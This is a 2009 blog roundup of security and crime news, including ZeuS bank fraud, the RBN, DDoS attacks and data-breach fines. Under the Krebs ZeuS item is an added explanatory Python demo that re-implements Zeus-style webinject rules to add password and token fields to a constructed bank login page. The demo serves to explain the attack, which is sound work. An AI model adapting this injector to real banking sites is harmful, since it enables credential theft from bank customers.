Fergie's Tech Blog
Friday, October 23, 2009
Thursday, October 22, 2009
Thailand Rejects U.S. Pressure Over 'Merchant of Death'
Russian alleged arms dealer Viktor Bout shows a victory sign at the Criminal Court in Bangkok in August.
Via The Thailand Post.
A senior Thai prosecutor rejected pressure from Washington Thursday over its appeal for the extradition of Russian arms dealer Viktor Bout, known as the "Merchant of Death".
More here.
Bangkok's appeals court is considering an appeal by the Thai government against the criminal court's ruling in August that Bout should not be sent to the United States to stand trial.
A US official said Wednesday that US President Barack Obama on his Asia trip next month will press Thailand to go ahead with the extradition.
Bout's colourful life is said to have inspired the Hollywood film "Lord of Death" and he is accused of peddling weapons around the world, including to Al-Qaeda.
Image source: The Thailand Post
SCADA Watch: 'Smart Grids Are Like a Hacker's Wet Dream'
Angus Kidman writes on ITWire.com:
"Smart grids are like a hacker's wet dream," Ira Winkler, president of Internet Security Advisors Group, told a press briefing at RSA Conference Europe in London this week.
More here.
The essential problem is that smart grid devices like intelligent power meters are PC-based and are thus subject to all the vulnerabilities of any computer system. "Smart grids are essentially computers that have a special purpose," Winkler said.
An added complication is that the means of updating smart grid equipment when vulnerabilities are detected is not clear. "If somebody finds a single vulnerability, who is going to be responsible for upgrading it?"
While electricity networks are often government regulated even in markets like Australia where power supply is being privatised, that doesn't necessarily simplify the issue, Winkler said. "Just imagine if the government said 'We are sending government agents to update all your systems.'"
Overall mistrust of computer reliability might also be a problem, Winkler suggested. "Do you want that smart grid in your house to be able to reboot?"
Wednesday, October 21, 2009
Russian Police And Internet Registry Accused Of Aiding Cyber Crime
Amsterdam-based Internet registry organisation RIPE NCC has been singled out for its involvement with notorious criminal network provider Russian Business Network (RBN) by the UK's Serious Organised Crime Agency.
More here.
The registrar took money from the well-known criminal organisation, and subsequently corruption in the Russian police allowed the network's organisers to escape SOCA's clutches according to Andy Auld, head of intelligence for the agency's e-crime department, speaking at the RSA Conference Europe security event this week in London.
RIPE NCC denies any wrongdoing, and Auld explained that the registrar wasn't actually being investigated for its involvement with RBN - but as the registry body had accepted payment from the Russian criminal organisation, it could be seen by some as having been complicit in criminal activities, he said.
"An entity like Russian Business Network - a criminal ISP and recognised as such by just about every media outlet worldwide that covers these things - RBN was registered as local internet registry with RIPE, the European body allocating IP resources to industry," explained Auld.
The SOCA officer argued that any company that does business with a known cyber-criminal organisation such as RBN could itself be open to accusations of acting illegally.
Experts See Forecast Worsen for Cyber Crime
Jeremy Kirk writes on PC World:
Law enforcement agencies can count a few recent victories against cybercriminals, but agents say the battle against them isn't getting any easier.
More here.
Highly organized cybercriminals are using increasingly sophisticated tools and methods that make them hard to trace, said Keith Mularski, supervisory special agent with the U.S. Federal Bureau of Investigation's Cyber Division.
"They have evolved over the years," Mularski said. "It really is organized crime."
Mularski, who spoke at the RSA conference in London on Wednesday, has had great success in infiltrating organized cybercrime rings. He successfully infiltrated a ring known as DarkMarket, an online forum where criminals bought and sold personal data, such as credit card numbers. DarkMarket was shut down about a year ago and 59 people were arrested, with the help of authorities in the U.K., Germany, Turkey and other countries.
While the DarkMarket bust was a big win, there are still such forums operating today and they're hard to infiltrate. New members must be vetted for reliability and to ensure they're not agents like Mularski.
Tuesday, October 20, 2009
U.S. Toll in Iraq, Afghanistan
Iraq and Afghanistan statistics via The Boston Globe (AP).
As of Tuesday, Oct. 20, 2009, at least 4,351 members of the U.S. military had died in the Iraq war since it began in March 2003, according to an Associated Press count.
More here and here.
The figure includes nine military civilians killed in action. At least 3,474 military personnel died as a result of hostile action, according to the military's numbers.
The AP count is four fewer than the Defense Department's tally, last updated Tuesday at 10 a.m. EDT.
As of Tuesday, Oct. 20, 2009, at least 805 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures Tuesday at 10 a.m. EDT.
Of those, the military reports 622 were killed by hostile action.
Honor the Fallen.
More ZeuS Damage
Brian Krebs writes on Security Fix:
I discovered the latest example of this failure just last week, when I spoke with Genlabs Corp., a chemical manufacturing firm based in Chino, Calif. Even though Genlabs' business banking account was protected by a security token code and a password, the thieves still were able to break into the firm's account online and transfer $437,000 to 50 different co-conspirators around the country.
More here.
Joyce Nicola, Genlabs' controller, said the thieves infected a PC belonging to a subordinate who was helping to set up new payroll accounts for the company. Normally, Nicola said, when they log in to their account at the bank, the site asks for a user name on one page, then the next page requests a password, and a third and final page requires the user to type in the output from a key fob that generates a new six-digit number every 60 seconds. When the employee logged in to the bank's site on the morning of the 16th, all three of those fields were instead present on the bank's home page.
A local computer forensics expert later determined that an infection from the "Zbot Trojan" (a.k.a., "Zeus") had allowed the attackers to re-write the bank's login screen as displayed on the employee's computer, so that the credentials were intercepted before they could be sent on to the bank's actual Web site. The technician's report on the Zeus infection -- available here [.pdf] -- is worth reading, particularly points 5 and 6, which noted that the infection could not be diagnosed from within Windows.
To date, Genlabs has succeeded in reversing just $48,000 worth of fraudulent transfers, Nicola said.
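What Krebs describes above is a "webinject": the trojan hooks the browser after TLS has been stripped, so it can rewrite the page the bank actually sent before it is rendered. The bank's site is untouched and the server sees nothing unusual; the extra fields exist only inside the victim's browser, and the user name, password and the still-valid one-time code are harvested together from a single form. The following is an added example, not code from the Krebs article or from the forensic report it links; it re-implements that rewrite in miniature. The rule syntax is modelled on the publicly documented Zeus webinjects.txt layout (set_url / data_before / data_inject / data_after / data_end, with `*` as a wildcard); the bank URL, the page markup and the field names are constructed for the demo.

```python
"""
Constructed demo of a Zeus-style webinject: the rule below is applied to a
bank login page so that a username-only page suddenly carries password and
token fields too. Nothing here is the real bank's markup or the real trojan's
parser; the rule format is a simplified version of the public webinjects.txt
syntax and everything else is made up for the example.
"""
import re

# Constructed stand-in for what the real bank serves as page 1: username only.
LEGIT_PAGE_1 = """<html><body>
<form action="/login/step1" method="post">
  <label>User name <input type="text" name="username"></label>
  <input type="submit" value="Next">
</form>
</body></html>"""

# Constructed rule: once the username box is on screen, add password and
# token boxes right after it. The flags G and P mean apply on GET and POST.
WEBINJECT_RULES = """
set_url https://bank.example/login/step1* GP
data_before
<input type="text" name="username"></label>
data_end
data_inject
<label>Password <input type="password" name="password"></label>
<label>Token code <input type="text" name="token"></label>
data_end
data_after
data_end
"""


def parse_rules(text):
    """Parse webinject rules into dicts with url, flags, before, inject, after."""
    rules, rule, section, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url "):
            parts = stripped.split()
            rule = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                    "before": "", "inject": "", "after": ""}
            rules.append(rule)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section, buf = stripped[len("data_"):], []
        elif stripped == "data_end":
            if rule is not None and section is not None:
                rule[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def _glob(pattern):
    """Turn a webinject pattern ('*' matches anything) into a compiled regex."""
    return re.compile(".*?".join(re.escape(p) for p in pattern.split("*")), re.S)


def apply_webinjects(url, html, rules):
    """Rewrite `html` the way the trojan does before the browser renders it.

    The text between the data_before and data_after matches is replaced by
    data_inject; with an empty data_after the injection is simply inserted
    after the data_before match. Pages no rule matches come back unchanged.
    """
    for rule in rules:
        if not _glob(rule["url"]).fullmatch(url):
            continue
        start = end = 0
        if rule["before"]:
            m = _glob(rule["before"]).search(html)
            if not m:
                continue
            start = end = m.end()
        if rule["after"]:
            m = _glob(rule["after"]).search(html, start)
            if not m:
                continue
            end = m.start()
        html = html[:start] + rule["inject"] + html[end:]
    return html


def form_fields(html):
    """Names of the named <input> elements, in page order."""
    return re.findall(r'<input[^>]*\sname="([^"]+)"', html)


if __name__ == "__main__":
    rules = parse_rules(WEBINJECT_RULES)
    url = "https://bank.example/login/step1"
    print("bank sent :", form_fields(LEGIT_PAGE_1))
    print("user sees :", form_fields(apply_webinjects(url, LEGIT_PAGE_1, rules)))
```

Run as is, the script shows the bank's page carrying only `username` and the rendered page carrying `username`, `password` and `token`, which is exactly the symptom the Genlabs employee saw. Because the rewrite happens on the client after decryption, neither TLS nor the bank's server-side logic can observe it, which is why the forensic report's note that the infection could not be diagnosed from within Windows matters: the only reliable checks are from outside the compromised host.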
Judge Refuses to Lift 5-Year-Old Patriot Act Gag Order
David Kravets writes on Threat Level:
A federal judge on Tuesday declined to remove a gag order imposed on the president of a small ISP who wants to reveal the contents of a national security letter he received from the FBI.
More here.
The NSL demanded the president of the New York company provide the government with e-mails from a customer the government deemed a threat. An NSL, a type of self-issued subpoena fortified by the Patriot Act, allows the FBI to obtain telecommunication, financial and credit records relevant to a government investigation without a court warrant.
The case last hit the courts in December, when the 2nd U.S. Circuit Court of Appeals, in a decision with Sonia Sotomayor in the majority, narrowed the standard by which recipients of NSLs must keep mum.
Those supplying the requested data to the government are forbidden from disclosing their mandatory cooperation, and face up to five years in prison for breaching the gag. The government issues about 50,000 NSLs each year, and an internal audit showed widespread government abuse in connection to them.
On Tuesday, a New York judge ruling in the lawsuit brought by the anonymous ISP president, declined to lift the gag placed on him, despite the new gagging standards announced by the 2nd Circuit. The lower court judge’s decision was based on secret evidence the FBI provided.
Cyber Attacks Smite Atheist Websites
Asher Moses writes on The Age:
Australian atheists are under attack, with the websites of both the Atheist Foundation of Australia and the Global Atheist Convention knocked offline in a major cyber attack yesterday afternoon.
More here.
The "distributed denial of service" attacks flooded the websites with traffic, forcing them offline about 5.20pm yesterday.
As of this morning, the foundation had still not been able to restore the websites.
The attacks may be related to the Global Atheist Convention, which is being held in Melbourne in March next year. Speakers include Richard Dawkins, author of The God Delusion and comedy writer Catherine Deveny.
Image source: The Age / Reuters
Trial Set to Begin in Economic Espionage Case Involving China
Jaikumar Vijayan writes on ComputerWorld:
A jury trial is set to begin in a somewhat rare trade-secret theft case in which federal prosecutors are trying to prove that two engineers misappropriated trade secrets from a U.S. technology company to benefit China's government.
More here.
The case is being prosecuted under a rarely used provision of the Economic Espionage Act (EEA) of 1996, which deals with the theft of trade secrets for the benefit of a foreign nation. The law was passed in response to a perceived need to protect U.S. trade secrets and intellectual property from foreign government-sponsored theft.
There have been only five cases so far in which individuals have been indicted under this provision in the EEA. Last June, Xiaodong Meng, 44, a software engineer born in China, became the first to be sentenced under the law.
Meng was sentenced to two years and ordered to pay a fine of $10,000 after he pleaded guilty to, among other things (PDF document), stealing at least six source-code products and more than 100 other software components from his employer, Quantum 3D Inc.
FTC Slams MoneyGram With $18M Charge to Settle Fraud Complaints
Michael Cooney writes in NetworkWorld:
This place sounds like scam central. The second-largest money transfer service in the United States, MoneyGram International today agreed to pay $18 million in consumer redress to settle FTC charges that the company allowed its money transfer system to be used by fraudulent telemarketers to bilk U.S. consumers out of tens of millions of dollars.
More here.
The FTC charged that between 2004 and 2008, MoneyGram agents helped fraudulent telemarketers and other con artists who tricked US consumers into wiring more than $84 million within the United States and to Canada – after these consumers were falsely told they had won a lottery, were hired for a secret shopper program, or were guaranteed loans. The $84 million in losses is based on consumer complaints to MoneyGram – actual consumer losses likely are much higher, the FTC stated.
The FTC charged that MoneyGram knew that its system was being used to defraud people but did very little about it, and that in some cases its agents in Canada actually participated in these schemes. According to the FTC’s complaint, MoneyGram knew, or avoided knowing, that about 131 of its more than 1,200 agents accounted for more than 95% of the fraud complaints it received in 2008 regarding money transfers to Canada; a similarly small number of agents was responsible for more than 96% of all fraud complaints to the company in 2006.
Voice Over IP 'Hacker' in Court Today
Ed Berridge writes on The Inquirer:
A Venezuelan has been dragged to the US to face trial on charges of hacking into voice over IP networks.
More here.
Edwin Pena, 26, was arrested in Mexico last year. The 20-count indictment charges Pena with conspiracy to secretly hack into the computer networks of unsuspecting Voice over Internet Protocol (VoIP) phone service providers, conspiracy to commit wire fraud by transmitting telephone calls over the victims' networks, and individual hacking and wire fraud counts.
An FBI spokesman said that the extradition represents the continued success of the United States in working with foreign countries to bring alleged cyber criminals to justice.
Monday, October 19, 2009
ChoicePoint to Pay Fine for Second Data Breach
Grant Gross writes on PC World:
Data broker ChoicePoint, the victim of a 2004 data breach affecting more than 160,000 U.S. residents, has agreed to strengthen its data security efforts and pay a fine for a second breach in 2008, the U.S. Federal Trade Commission said Monday.
More here.
ChoicePoint, now a subsidiary of Reed Elsevier, will pay US$275,000 to resolve the newest FTC complaint. The FTC accused the company of failing to implement a comprehensive information security program to protect consumers' personal information, as required by the agency after the 2004 breach.
The April 2008 breach compromised the personal data of 13,750 people, the FTC said in a press release. ChoicePoint turned off a "key" electronic security tool used to monitor access to one of its databases, and failed to detect that the security tool was turned off for four months, the FTC said.
For a 30-day period, an unknown hacker conducted thousands of unauthorized searches of a ChoicePoint database containing sensitive consumer information, including Social Security numbers, the FTC said. After discovering the breach, the company notified the FTC.
If the software tool had been working, ChoicePoint likely would have detected the intrusions "much earlier," the FTC said.